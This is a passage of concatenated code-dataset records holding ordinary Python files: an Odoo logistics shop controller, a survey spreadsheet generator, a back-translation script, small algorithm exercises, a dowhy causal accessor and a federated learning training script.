odoo.addons.website_sale_network.controllers.main import WebsiteSaleDeliveryNetwork\n\n_logger = logging.getLogger(__name__)\n\n\nPPG = 20 # Products Per Page\nPPR = 4 # Products Per Row\n\n\nclass LogisticsShop(WebsiteSaleDeliveryNetwork):\n @http.route([\n '''/logistics_shop''',\n '''/logistics_shop/page/''',\n '''/logistics_shop/category/''',\n '''/logistics_shop/category//page/'''\n ], type='http', auth=\"public\", website=True)\n def logistics_shop(self, page=0, category=None, search='', ppg=False, **post):\n add_qty = int(post.get('add_qty', 1))\n if category:\n category = request.env['product.public.category'].search([('id', '=', int(category))], limit=1)\n if not category or not category.can_access_from_current_website():\n raise NotFound()\n\n if ppg:\n try:\n ppg = int(ppg)\n except ValueError:\n ppg = PPG\n post[\"ppg\"] = ppg\n else:\n ppg = PPG\n\n attrib_list = request.httprequest.args.getlist('attrib')\n attrib_values = [[int(x) for x in v.split(\"-\")] for v in attrib_list if v]\n attributes_ids = {v[0] for v in attrib_values}\n attrib_set = {v[1] for v in attrib_values}\n\n domain = self._get_search_domain(search, category, attrib_values)\n\n keep = QueryURL('/logistics_shop', category=category and int(category), search=search, attrib=attrib_list,\n order=post.get('order'))\n\n pricelist_context, pricelist = self._get_pricelist_context()\n\n request.context = dict(request.context, pricelist=pricelist.id, partner=request.env.user.partner_id)\n\n url = \"/logistics_shop\"\n if search:\n post[\"search\"] = search\n if attrib_list:\n post['attrib'] = attrib_list\n\n Product = request.env['product.template'].with_context(bin_size=True)\n\n Category = request.env['product.public.category']\n search_categories = False\n search_product = Product.search(domain)\n if search:\n categories = search_product.mapped('public_categ_ids')\n search_categories = Category.search(\n [('id', 'parent_of', categories.ids)] + request.website.website_domain())\n categs = search_categories.filtered(lambda c: not c.parent_id)\n else:\n categs = Category.search([('parent_id', '=', False)] + request.website.website_domain())\n\n parent_category_ids = []\n if category:\n url = \"/logistics_shop/category/%s\" % slug(category)\n parent_category_ids = [category.id]\n current_category = category\n while current_category.parent_id:\n parent_category_ids.append(current_category.parent_id.id)\n current_category = current_category.parent_id\n\n product_count = len(search_product)\n pager = request.website.pager(url=url, total=product_count, page=page, step=ppg, scope=7, url_args=post)\n products = Product.search(domain, limit=ppg, offset=pager['offset'], order=self._get_search_order(post))\n\n ProductAttribute = request.env['product.attribute']\n if products:\n # get all products without limit\n attributes = ProductAttribute.search([('attribute_line_ids.value_ids', '!=', False),\n ('attribute_line_ids.product_tmpl_id', 'in', search_product.ids)])\n else:\n attributes = ProductAttribute.browse(attributes_ids)\n\n compute_currency = self._get_compute_currency(pricelist, products[:1])\n\n values = {\n 'search': search,\n 'category': category,\n 'attrib_values': attrib_values,\n 'attrib_set': attrib_set,\n 'pager': pager,\n 'pricelist': pricelist,\n 'add_qty': add_qty,\n 'products': products,\n 'search_count': product_count, # common for all searchbox\n 'bins': TableCompute().process(products, ppg),\n 'rows': PPR,\n 'categories': categs,\n 'attributes': attributes,\n 'compute_currency': compute_currency,\n 'keep': keep,\n 'parent_category_ids': parent_category_ids,\n 'search_categories_ids': search_categories and search_categories.ids,\n }\n if category:\n values['main_object'] = category\n return request.render(\"website_logistics_shop.logistics_products\", values)\n\n @http.route(['/logistics_shop/product/'], type='http', auth=\"public\", website=True)\n def logistics_product(self, product, category='', search='', **kwargs):\n if not product.can_access_from_current_website():\n raise NotFound()\n\n add_qty = int(kwargs.get('add_qty', 1))\n\n product_context = dict(request.env.context, quantity=add_qty,\n active_id=product.id,\n partner=request.env.user.partner_id)\n ProductCategory = request.env['product.public.category']\n\n if category:\n category = ProductCategory.browse(int(category)).exists()\n\n attrib_list = request.httprequest.args.getlist('attrib')\n attrib_values = [[int(x) for x in v.split(\"-\")] for v in attrib_list if v]\n attrib_set = {v[1] for v in attrib_values}\n\n keep = QueryURL('/logistics_shop', category=category and category.id, search=search, attrib=attrib_list)\n\n categs = ProductCategory.search([('parent_id', '=', False)])\n\n pricelist = request.website.get_current_pricelist()\n\n def compute_currency(price):\n return product.currency_id._convert(price, pricelist.currency_id,\n product._get_current_company(pricelist=pricelist,\n website=request.website),\n fields.Date.today())\n\n if not product_context.get('pricelist'):\n product_context['pricelist'] = pricelist.id\n product = product.with_context(product_context)\n\n values = {\n 'search': search,\n 'category': category,\n 'pricelist': pricelist,\n 'attrib_values': attrib_values,\n # compute_currency deprecated, get from product\n 'compute_currency': compute_currency,\n 'attrib_set': attrib_set,\n 'keep': keep,\n 'categories': categs,\n 'main_object': product,\n 'product': product,\n 'add_qty': add_qty,\n 'optional_product_ids': [p.with_context(active_id=p.id) for p in product.optional_product_ids],\n # get_attribute_exclusions deprecated, use product method\n 'get_attribute_exclusions': self._get_attribute_exclusions,\n }\n return request.render(\"website_logistics_shop.logistics_product_info\", values)\n\n @http.route(['/logistics_shop/sale_order/'], type='http', auth=\"user\", website=True, methods=['POST'])\n def logistics_create_sale_order(self, service_product_id=None, **post):\n\n _logger.info({\n 'logistics_create_sale_order post': post\n })\n # order = request.website.sale_get_order()\n if post:\n\n service_product_id = request.env['product.product'].browse(service_product_id)\n\n self.create_sale_order(post, service_product_id)\n\n return request.redirect('/logistics_shop')\n\n # 创建销售订单\n def create_sale_order(self, post, service_product_id):\n \"\"\"\n 创建销售订单\n :return:\n \"\"\"\n current_partner_id = request.env.user.partner_id\n from_location_name = post.get('from_location_name', False)\n to_location_name = post.get('to_location_name', False)\n delivery_carrier_id = post.get('logistics_delivery_type', False)\n delivery_weight = post.get('product_weight')\n delivery_amount = post.get('delivery_amount')\n\n from_warehouse_id, to_warehouse_id = self.find_correct_belong_position(\n from_location_name,\n to_location_name\n )\n\n order_obj = request.env['sale.order'].sudo()\n data = {\n 'partner_id': current_partner_id.id,\n 'partner_invoice_id': current_partner_id.id,\n 'partner_shipping_id': current_partner_id.id,\n 'carrier_id': delivery_carrier_id,\n 'from_warehouse_id': from_warehouse_id.id,\n 'to_warehouse_id': to_warehouse_id.id,\n 'src_location_name': from_location_name,\n 'dest_location_name': to_location_name\n }\n\n order_line_data = self.parse_sale_order_line_data(service_product_id, delivery_weight, delivery_amount)\n\n data.update({\n 'order_line': order_line_data\n })\n\n _logger.info({\n 'data': data\n })\n sale_order_id = order_obj.create(data)\n\n # 订单行\n def parse_sale_order_line_data(self, service_product_id, delivery_weight, delivery_amount):\n unit_product_id = request.env['product.product'].sudo().search([\n ('barcode', '=', 'TEST_UNIT_PRODUCT')\n ])\n service_product_data = {\n 'product_id': service_product_id.id,\n 'name': service_product_id.name,\n 'product_uom': service_product_id.uom_id.id,\n 'product_uom_qty': 1,\n 'price_unit': delivery_amount\n }\n unit_product_data = {\n 'product_id': unit_product_id.id,\n 'name': unit_product_id.name,\n 'product_uom': unit_product_id.uom_id.id,\n 'product_uom_qty': delivery_weight\n }\n data = [(0, 0, service_product_data), (0, 0, unit_product_data)]\n return data\n\n @http.route(['/get_location_lng_lat'], type='json', auth='public', methods=['POST'], website=True, csrf=False)\n def get_location_lng_lat(self, **post):\n if post:\n location_name = post.get('location_name', False)\n if location_name:\n location_lng, location_lat = self.get_long_lat_value(location_name)\n return {\n 'location_lng': location_lng,\n 'location_lat': location_lat,\n 'location_lng_lat': location_lng + ', ' + location_lat\n }\n\n @http.route(['/logistics/delivery_price'], type='json', auth='public', methods=['POST'], website=True, csrf=False)\n def get_logistics_delivery_price(self, **post):\n _logger.info({\n 'post': post\n })\n if post:\n carrier_id = request.env['delivery.carrier'].browse(int(post.get('carrier_id')))\n from_location_name = post.get('from_location_name', False)\n to_location_name = post.get('to_location_name', False)\n\n _logger.info({\n 'from_location_name': from_location_name,\n 'to_location_name': to_location_name,\n 'carrier_id': carrier_id\n })\n\n from_warehouse_id, to_warehouse_id = self.find_correct_belong_position(\n from_location_name,\n to_location_name\n )\n\n # 价格最低\n price_total, shortest_path = carrier_id.get_price_from_network_by_warehouse(\n from_warehouse_id,\n to_warehouse_id,\n shortest_path=True,\n usage_type='price'\n )\n\n _logger.info({\n 'price_total': price_total,\n 'shortest_path': shortest_path\n })\n type_distance, type_distance_path = carrier_id.get_price_from_network_by_warehouse(\n from_warehouse_id,\n to_warehouse_id,\n shortest_path=True,\n usage_type='distance'\n )\n\n type_time, type_time_path = carrier_id.get_price_from_network_by_warehouse(\n from_warehouse_id,\n to_warehouse_id,\n shortest_path=True,\n usage_type='time'\n )\n #\n # type_time = False\n # type_time_path = False\n # type_distance = False\n # type_distance_path = False\n # 返回经纬度 get_long_lat_value\n # from_lng, from_lat = self.get_long_lat_value(from_location_name)\n # to_lng, to_lat = self.get_long_lat_value(to_location_name)\n # from_location_lnglat = from_lng + ', ' + from_lat\n # to_location_lnglat = to_lng + ', ' + to_lat\n\n return {\n 'type_distance': type_distance,\n 'type_distance_path': type_distance_path,\n 'type_time': type_time,\n 'type_time_path': type_time_path,\n # 'from_location_lnglat': from_location_lnglat,\n # 'to_location_lnglat': to_location_lnglat,\n 'carrier_id': carrier_id.id,\n 'shortest_path': shortest_path,\n 'success': True,\n 'new_amount_delivery': price_total,\n 'error_message': False,\n 'warning_message': False\n }\n","repo_name":"id10tttt/Logistics_Platform","sub_path":"website_logistics_shop/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13980,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"36058905378","text":"import random\nimport sys\n\nfrom scripts.statistics.survey_generator import *\n\nif __name__ == \"__main__\":\n if len(sys.argv) <= 1:\n subject_idx = 00\n subject_cod = str(00)\n subject_hrtf = str(000)\n else:\n subject_idx = int(sys.argv[1])\n subject_cod = str(sys.argv[2])\n subject_hrtf = str(sys.argv[3])\n\n survey_setup = json_load(\"scripts/statistics/survey_setup.json\")\n trial_setups = survey_setup[\"trial_setups\"]\n conditions = [(\"complexity\", \"latin\"),\n (\"room\", \"shuffle\"),\n (\"conditions\", \"shuffle\"),\n (\"speaker\", \"shuffle\")]\n\n sg = SurveyGenerator(survey_setup, conditions, subject_idx, len(survey_setup['complexity']))\n randomized_dict = sg.get_randomized_dict()\n\n for complexity, rooms in randomized_dict.items():\n for room, conditions in rooms.items():\n for condition, speakers in conditions.items():\n conditions[condition] = random.sample(speakers, int(complexity))\n\n workbook = xlsxwriter.Workbook(f'test_results/{subject_idx}_{subject_cod}_{subject_hrtf}.xlsx')\n\n cell_format = workbook.add_format({'border': 1, 'align': 'left'})\n impostor_format = workbook.add_format({'italic': 1, 'border': 1, 'align': 'left', 'bg_color': 'pink'})\n speaker_colors = {\"DAVID\": 'red', \"ALEX\": 'cyan', \"SUSAN\": 'lime', \"MARIA\": 'yellow'}\n\n merge_format = workbook.add_format({\n 'bold': 1,\n 'border': 2,\n 'align': 'center',\n 'valign': 'vcenter'})\n\n for c_col, complexity in enumerate(randomized_dict.keys()):\n c_idx = c_col * 2\n comp = int(complexity)\n compsheet = workbook.add_worksheet(f'Complexity_{complexity}')\n compsheet.set_column(0, 7, 17)\n\n for r_col, room in enumerate(randomized_dict[complexity].keys()):\n conditions = randomized_dict[complexity][room].keys()\n n_conditions = len(conditions)\n\n r_idx = r_col * 2\n compsheet.merge_range(0,\n r_idx,\n 0,\n r_idx + 1,\n room,\n merge_format)\n\n for cond_idx, condition in enumerate(conditions):\n cond_row = (cond_idx * (comp + 2)) + 1\n compsheet.merge_range(cond_row,\n r_idx,\n cond_row,\n r_idx + 1,\n condition,\n merge_format)\n compsheet.write(cond_row + 1, r_idx, \"same_room\", cell_format)\n compsheet.write_blank(cond_row + 1, r_idx + 1, None, cell_format)\n\n for i, speaker in enumerate(randomized_dict[complexity][room][condition]):\n impostor = trial_setups[room][complexity]['impostor'][condition]\n position = trial_setups[room][complexity]['position'][i]\n if impostor != position:\n color = speaker_colors[speaker]\n speaker_format = workbook.add_format({'border': 1, 'align': 'left', 'bg_color': color})\n pos_format = speaker_format\n else:\n pos_format = impostor_format\n compsheet.write(cond_row + i + 2, r_idx, f'{position} - {speaker}', pos_format)\n compsheet.write_blank(cond_row + i + 2, r_idx + 1, None, cell_format)\n\n questionnaire = workbook.add_worksheet(\"Questionnaire\")\n\n questionnaire.set_column(0, 6, 17)\n questionnaire.set_column(6, 6, 100)\n\n rooms = {'ALEX': 'METU',\n 'DAVID': '3D_MARCo',\n 'SUSAN': 'LIVING_ROOM',\n 'MARIA': '3D_MARCo'}\n\n speakers = survey_setup['speaker']\n conditions = ['Ref', 'HOA_Bin', 'FV']\n\n latin_size = len(speakers)\n latin_square = latin_squares[str(latin_size)]\n\n s_idx = subject_idx % latin_size\n subject_offset = s_idx * latin_size\n latin_row = latin_square[subject_offset: subject_offset + latin_size]\n\n questionnaire.write(0, 0, \"Room\", merge_format)\n questionnaire.write(0, 1, \"Condition\", merge_format)\n questionnaire.write(0, 2, \"Speaker\", merge_format)\n questionnaire.write(0, 3, \"Externalization\", merge_format)\n\n questionnaire.write(0, 4, \"Question\", merge_format)\n questionnaire.write(1, 4, \"Age\", cell_format)\n questionnaire.write(2, 4, \"Sex\", cell_format)\n questionnaire.write(3, 4, \"Reverberation\", cell_format)\n questionnaire.write(4, 4, \"VR\", cell_format)\n questionnaire.write(5, 4, \"Impairment\", cell_format)\n questionnaire.write(6, 4, \"Start (Preliminary)\", cell_format)\n questionnaire.write(7, 4, \"End (Test)\", cell_format)\n questionnaire.write(8, 4, \"Duration\", cell_format)\n\n questionnaire.write(0, 5, \"Answer\", merge_format)\n questionnaire.write(0, 6, \"Feedback\", merge_format)\n\n for i, speaker in enumerate(latin_row):\n idx = i % len(rooms)\n sp = speakers[speaker]\n\n color = speaker_colors[sp]\n speaker_format = workbook.add_format({'border': 1, 'align': 'left', 'bg_color': color})\n\n row_idx = i * 3\n\n questionnaire.write(row_idx + 1, 0, rooms[sp], cell_format)\n questionnaire.write(row_idx + 2, 0, rooms[sp], cell_format)\n questionnaire.write(row_idx + 3, 0, rooms[sp], cell_format)\n\n conditions = random.sample(conditions, len(conditions))\n\n questionnaire.write(row_idx + 1, 1, conditions[0], cell_format)\n questionnaire.write(row_idx + 2, 1, conditions[1], cell_format)\n questionnaire.write(row_idx + 3, 1, conditions[2], cell_format)\n\n questionnaire.write(row_idx + 1, 2, sp, speaker_format)\n questionnaire.write(row_idx + 2, 2, sp, speaker_format)\n questionnaire.write(row_idx + 3, 2, sp, speaker_format)\n\n workbook.close()\n print(0)\n","repo_name":"RickBn/Reverb_Parameters_Optimization","sub_path":"generate_survey.py","file_name":"generate_survey.py","file_ext":"py","file_size_in_byte":5990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40527205266","text":"# Install the required transformers library.\n# !pip install transformers\n\nimport torch\nfrom transformers import MarianMTModel, MarianTokenizer\n\n\nclass BackTranslation:\n def __init__(self):\n # Create source language tokenizer and model\n self.tokenizer_src = MarianTokenizer.from_pretrained('Helsinki-NLP/opus-mt-en-fr')\n self.model_src = MarianMTModel.from_pretrained('Helsinki-NLP/opus-mt-en-fr')\n\n # Create target language tokenizer and model\n self.tokenizer_tgt = MarianTokenizer.from_pretrained('Helsinki-NLP/opus-mt-fr-en')\n self.model_tgt = MarianMTModel.from_pretrained('Helsinki-NLP/opus-mt-fr-en')\n\n def translate(self, text, model, tokenizer):\n \"\"\"Translate a given text using the provided model and tokenizer.\"\"\"\n encoded_text = tokenizer.prepare_seq2seq_batch([text], return_tensors='pt')\n translation_logits = model.generate(**encoded_text)\n decoded_translation = tokenizer.batch_decode(translation_logits, skip_special_tokens=True)[0]\n\n return decoded_translation\n\n def backtranslate(self, text, n=1):\n \"\"\"Backtranslate a given text n times.\"\"\"\n augmented_text = text\n\n for i in range(n):\n # Translate to French\n fr_text = self.translate(augmented_text, self.model_src, self.tokenizer_src)\n\n # Translate back to English\n en_text = self.translate(fr_text, self.model_tgt, self.tokenizer_tgt)\n\n # Use this augmented text as the basis for the next augmentation\n augmented_text = en_text\n\n print(f\"Augmentation {i + 1}: {augmented_text}\")\n\n\n# Test the script\nbt = BackTranslation()\nsentence = \"This day is very nice but I wish I could have some ice cream as well.\"\naugment_num = 10\n\nbt.backtranslate(sentence, augment_num)\n","repo_name":"RobinGerster/Data-Augmentation-Project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"27716381545","text":"# def gcd(a, b):\n# while b:\n# a, b = b, a % b\n# return a\n# def lcm(a, b):\n# return (a * b) // gcd(a, b)\n# for _ in range(int(input())):\n# num1, num2 = map(int,input().split())\n# result_lcm = lcm(num1, num2)\n# print(f\"LCM = {result_lcm}\")\n\ndef compute_lcm(x, y):\n\n if x > y:\n greater = x\n else:\n greater = y\n\n while(True):\n if((greater % x == 0) and (greater % y == 0)):\n lcm = greater\n break\n greater += 1\n\n return lcm\nt = int(input())\nfor _ in range(t):\n num1, num2 = map(int, input().split())\n\n print(f\"LCM = {compute_lcm(num1, num2)}\")","repo_name":"mehedihasanreal/52_Problem_Solve","sub_path":"problem25.py","file_name":"problem25.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"42679474315","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution(object):\n def hasCycle(self, head):\n pre = cur = head\n while cur != None and cur.next != None:\n pre = pre.next\n cur = cur.next.next\n if cur == pre:\n return True\n return False\n\n \n\n","repo_name":"shawn2000100/LeetCode_Easy_Code","sub_path":"141. Linked List Cycle.py","file_name":"141. Linked List Cycle.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"12530064603","text":"import pandas as pd\nimport logging\nfrom dowhy.do_why import CausalModel\nimport dowhy.do_samplers as do_samplers\n\n\n@pd.api.extensions.register_dataframe_accessor(\"causal\")\nclass CausalAccessor(object):\n def __init__(self, pandas_obj):\n self._obj = pandas_obj\n self._causal_model = None\n self._sampler = None\n self._identified_estimand = None\n self._method = None\n\n def reset(self):\n self._causal_model = None\n self._identified_estimand = None\n self._sampler = None\n self._method = None\n\n def do(self, x, method='weighting', num_cores=1, variable_types={}, outcome=None, params=None, dot_graph=None,\n common_causes=None, instruments=None, estimand_type='ate', proceed_when_unidentifiable=False,\n stateful=False):\n x, keep_original_treatment = self.parse_x(x)\n if not stateful or method != self._method:\n self.reset()\n if not self._causal_model:\n self._causal_model = CausalModel(self._obj,\n [xi for xi in x.keys()][0],\n outcome,\n graph=dot_graph,\n common_causes=common_causes,\n instruments=instruments,\n estimand_type=estimand_type,\n proceed_when_unidentifiable=proceed_when_unidentifiable)\n self._identified_estimand = self._causal_model.identify_effect()\n if not self._sampler:\n self._method = method\n do_sampler_class = do_samplers.get_class_object(method + \"_sampler\")\n self._sampler = do_sampler_class(self._obj,\n self._identified_estimand,\n self._causal_model._treatment,\n self._causal_model._outcome,\n params=params,\n variable_types=variable_types,\n num_cores=num_cores,\n causal_model=self._causal_model,\n keep_original_treatment=keep_original_treatment)\n result = self._sampler.do_sample(x)\n if not stateful:\n self.reset()\n return result\n\n def parse_x(self, x):\n if type(x) == str:\n return {x: None}, True\n if type(x) == list:\n return {xi: None for xi in x}, True\n if type(x) == dict:\n return x, False\n raise Exception('x format not recognized: {}'.format(type(x)))\n","repo_name":"ghostintheshellarise/dowhy","sub_path":"dowhy/api/causal_data_frame.py","file_name":"causal_data_frame.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"12940927021","text":"import numpy as np\nimport json\nimport torch\nimport torch.optim as optim\nimport torch.nn as nn\nimport argparse\nimport logging\nimport os\nimport copy\nimport datetime\nimport random\n\n\nfrom model import *\nfrom utils import *\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('--model', type=str, default='resnet50', help='neural network used in training')\n parser.add_argument('--skip', type=int, default=3, help='neural network used in training')\n parser.add_argument('--dataset', type=str, default='cifar100', help='dataset used for training')\n parser.add_argument('--net_config', type=lambda x: list(map(int, x.split(', '))))\n parser.add_argument('--partition', type=str, default='homo', help='the data partitioning strategy')\n parser.add_argument('--batch-size', type=int, default=64, help='input batch size for training (default: 64)')\n parser.add_argument('--lr', type=float, default=0.1, help='learning rate (default: 0.1)')\n parser.add_argument('--epochs', type=int, default=5, help='number of local epochs')\n parser.add_argument('--n_parties', type=int, default=2, help='number of workers in a distributed cluster')\n parser.add_argument('--alg', type=str, default='fedavg',\n help='communication strategy: fedavg/fedprox')\n parser.add_argument('--comm_round', type=int, default=50, help='number of maximum communication roun')\n parser.add_argument('--init_seed', type=int, default=0, help=\"Random seed\")\n parser.add_argument('--dropout_p', type=float, required=False, default=0.0, help=\"Dropout probability. Default=0.0\")\n parser.add_argument('--datadir', type=str, required=False, default=\"./data/\", help=\"Data directory\")\n parser.add_argument('--reg', type=float, default=1e-5, help=\"L2 regularization strength\")\n parser.add_argument('--logdir', type=str, required=False, default=\"./logs/\", help='Log directory path')\n parser.add_argument('--modeldir', type=str, required=False, default=\"./models/\", help='Model directory path')\n parser.add_argument('--beta', type=float, default=0.5,\n help='The parameter for the dirichlet distribution for data partitioning')\n parser.add_argument('--device', type=str, default='cuda:0', help='The device to run the program')\n parser.add_argument('--log_file_name', type=str, default=None, help='The log file name')\n parser.add_argument('--optimizer', type=str, default='sgd', help='the optimizer')\n parser.add_argument('--mu', type=float, default=1, help='the mu parameter for fedprox or moon')\n parser.add_argument('--out_dim', type=int, default=256, help='the output dimension for the projection layer')\n parser.add_argument('--temperature', type=float, default=0.5, help='the temperature parameter for contrastive loss')\n parser.add_argument('--local_max_epoch', type=int, default=100, help='the number of epoch for local optimal training')\n parser.add_argument('--model_buffer_size', type=int, default=1, help='store how many previous models for contrastive loss')\n parser.add_argument('--pool_option', type=str, default='FIFO', help='FIFO or BOX')\n parser.add_argument('--sample_fraction', type=float, default=1.0, help='how many clients are sampled in each round')\n parser.add_argument('--load_model_file', type=str, default=None, help='the model to load as global model')\n parser.add_argument('--load_pool_file', type=str, default=None, help='the old model pool path to load')\n parser.add_argument('--load_model_round', type=int, default=None, help='how many rounds have executed for the loaded model')\n parser.add_argument('--load_first_net', type=int, default=1, help='whether load the first net as old net or not')\n parser.add_argument('--normal_model', type=int, default=0, help='use normal model or aggregate model')\n parser.add_argument('--loss', type=str, default='contrastive')\n parser.add_argument('--save_model',type=int,default=0)\n parser.add_argument('--use_project_head', type=int, default=1)\n parser.add_argument('--server_momentum', type=float, default=0, help='the server momentum (FedAvgM)')\n args = parser.parse_args()\n return args\n\n\n\ndef init_nets(net_configs, n_parties, args, device='cpu'):\n nets = {net_i: None for net_i in range(n_parties)}\n if args.dataset in {'mnist', 'cifar10', 'svhn', 'fmnist'}:\n n_classes = 10\n elif args.dataset == 'celeba':\n n_classes = 2\n elif args.dataset == 'cifar100':\n n_classes = 100\n elif args.dataset == 'tinyimagenet':\n n_classes = 200\n elif args.dataset == 'femnist':\n #print(\"flag\")\n n_classes = 26\n elif args.dataset == 'emnist':\n n_classes = 47\n elif args.dataset == 'xray':\n n_classes = 2\n if args.normal_model:\n for net_i in range(n_parties):\n if args.model == 'simple-cnn':\n if args.dataset in (\"cifar10\", \"cinic10\", \"svhn\"):\n #print(\"flag1\")\n net = SimpleCNNMNIST(input_dim=(16 * 4 * 4), hidden_dims=[120, 84], output_dim=10)\n elif args.dataset in (\"mnist\", 'femnist', 'fmnist'):\n #print(\"flag2\")\n net = SimpleCNNMNIST(input_dim=(16 * 4 * 4), hidden_dims=[120, 84], output_dim=10)\n if device == 'cpu':\n net.to(device)\n else:\n net = net.cuda()\n nets[net_i] = net\n else:\n for net_i in range(n_parties):\n if args.use_project_head:\n if args.dataset in (\"cifar10\", \"cinic10\", \"svhn\",\"cifar100\",\"tinyimagenet\"):\n net = ModelFedCon(args.model, args.out_dim, n_classes, net_configs)\n elif args.dataset in (\"mnist\", 'femnist', 'fmnist'):\n net = SimpleCNNMNIST(input_dim=(16 * 4 * 4), hidden_dims=[120, 84], output_dim=10)\n else:\n net = ModelFedCon_noheader(args.model, args.out_dim, n_classes, net_configs)\n if device == 'cpu':\n net.to(device)\n else:\n net = net.cuda()\n nets[net_i] = net\n\n model_meta_data = []\n layer_type = []\n for (k, v) in nets[0].state_dict().items():\n model_meta_data.append(v.shape)\n layer_type.append(k)\n\n return nets, model_meta_data, layer_type\n\n\ndef init_dataloader(args,net_dataidx_map):\n print(\"starting init dataloader\")\n train_dl_local_set=[]\n test_dl_local_set=[]\n for i in range(args.n_parties):\n dataidxs = net_dataidx_map[i]\n train_dl_local, test_dl_local, _, _=get_dataloader(args.dataset, args.datadir, args.batch_size, 32, dataidxs)\n train_dl_local_set.append(train_dl_local)\n test_dl_local_set.append(test_dl_local)\n print(len(train_dl_local_set))\n print(\"finishing init dataloader\")\n return train_dl_local_set,test_dl_local_set\n\n\ndef train_net(net_id, net, train_dataloader, test_dataloader, epochs, lr, args_optimizer, args, device=\"cpu\"):\n net = nn.DataParallel(net)\n net.cuda()\n logger.info('Training network %s' % str(net_id))\n logger.info('n_training: %d' % len(train_dataloader))\n logger.info('n_test: %d' % len(test_dataloader))\n\n train_acc,_ = compute_accuracy(net, train_dataloader, device=device)\n\n test_acc, conf_matrix,_ = compute_accuracy(net, test_dataloader, get_confusion_matrix=True, device=device)\n\n logger.info('>> Pre-Training Training accuracy: {}'.format(train_acc))\n logger.info('>> Pre-Training Test accuracy: {}'.format(test_acc))\n\n if args_optimizer == 'adam':\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, net.parameters()), lr=lr, weight_decay=args.reg)\n elif args_optimizer == 'amsgrad':\n optimizer = optim.Adam(filter(lambda p: p.requires_grad, net.parameters()), lr=lr, weight_decay=args.reg,\n amsgrad=True)\n elif args_optimizer == 'sgd':\n optimizer = optim.SGD(filter(lambda p: p.requires_grad, net.parameters()), lr=lr, momentum=0.9,\n weight_decay=args.reg)\n criterion = nn.CrossEntropyLoss().cuda()\n\n cnt = 0\n\n for epoch in range(epochs):\n epoch_loss_collector = []\n for batch_idx, (x, target) in enumerate(train_dataloader):\n x, target = x.cuda(), target.cuda()\n\n optimizer.zero_grad()\n x.requires_grad = False\n target.requires_grad = False\n target = target.long()\n\n _,_,out = net(x)\n loss = criterion(out, target)\n\n loss.backward()\n optimizer.step()\n\n cnt += 1\n epoch_loss_collector.append(loss.item())\n\n epoch_loss = sum(epoch_loss_collector) / len(epoch_loss_collector)\n logger.info('Epoch: %d Loss: %f' % (epoch, epoch_loss))\n\n\n train_acc, _ = compute_accuracy(net, train_dataloader, device=device)\n test_acc, conf_matrix, _ = compute_accuracy(net, test_dataloader, get_confusion_matrix=True, device=device)\n\n logger.info('>> Training accuracy: %f' % train_acc)\n logger.info('>> Test accuracy: %f' % test_acc)\n net.to('cpu')\n\n logger.info(' ** Training complete **')\n return train_acc, test_acc\n\n\n\ndef local_train_net(nets, selected, args, train_dl_set, test_dl, device=\"cpu\"):\n avg_acc = 0.0\n acc_list = []\n if global_model:\n global_model.cuda()\n\n for net_id, net in nets.items():\n \n \n n_epoch = args.epochs\n train_dl_id=selected[net_id]\n logger.info(\"Training network %s\" % (str(train_dl_id)))\n trainacc, testacc = train_net(train_dl_id, net, train_dl_set[train_dl_id], test_dl, n_epoch, args.lr, args.optimizer, args,\n device=device)\n\n logger.info(\"net %d final test acc %f\" % (train_dl_id, testacc))\n\n\n return nets\n\n\nif __name__ == '__main__':\n args = get_args()\n mkdirs(args.logdir)\n mkdirs(args.modeldir)\n if args.log_file_name is None:\n argument_path = 'experiment_arguments-%s.json' % datetime.datetime.now().strftime(\"%Y-%m-%d-%H%M-%S\")\n else:\n argument_path = args.log_file_name + '.json'\n with open(os.path.join(args.logdir, argument_path), 'w') as f:\n json.dump(str(args), f)\n device = torch.device(args.device)\n for handler in logging.root.handlers[:]:\n logging.root.removeHandler(handler)\n\n if args.log_file_name is None:\n args.log_file_name = 'experiment_log-%s' % (datetime.datetime.now().strftime(\"%Y-%m-%d-%H%M-%S\"))\n\n log_path = args.log_file_name + '.log'\n logging.basicConfig(\n filename=os.path.join(args.logdir, log_path),\n format='%(asctime)s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M', level=logging.DEBUG, filemode='w')\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n logger.info(device)\n\n seed = args.init_seed\n logger.info(\"#\" * 100)\n np.random.seed(seed)\n torch.manual_seed(seed)\n if torch.cuda.is_available():\n torch.cuda.manual_seed(seed)\n random.seed(seed)\n\n logger.info(\"Partitioning data\")\n X_train, y_train, X_test, y_test, net_dataidx_map, traindata_cls_counts = partition_data(\n args.dataset, args.datadir, args.logdir, args.partition, args.n_parties, beta=args.beta)\n\n n_party_per_round = int(args.n_parties * args.sample_fraction)\n party_list = [i for i in range(args.n_parties)]\n party_list_rounds = []\n if n_party_per_round != args.n_parties:\n for i in range(args.comm_round):\n party_list_rounds.append(random.sample(party_list, n_party_per_round))\n else:\n for i in range(args.comm_round):\n party_list_rounds.append(party_list)\n\n n_classes = len(np.unique(y_train))\n\n train_dl_global, test_dl, train_ds_global, test_ds_global = get_dataloader(args.dataset,\n args.datadir,\n args.batch_size,\n 32)\n\n train_dl_local_set,_=init_dataloader(args,net_dataidx_map)\n \n print(\"len train_dl_global:\", len(train_ds_global))\n train_dl=None\n data_size = len(test_ds_global)\n\n logger.info(\"Initializing nets\")\n \n nets, local_model_meta_data, layer_type = init_nets(args.net_config, n_party_per_round, args, device='cpu')\n\n global_models, global_model_meta_data, global_layer_type = init_nets(args.net_config, 1, args, device='cpu')\n 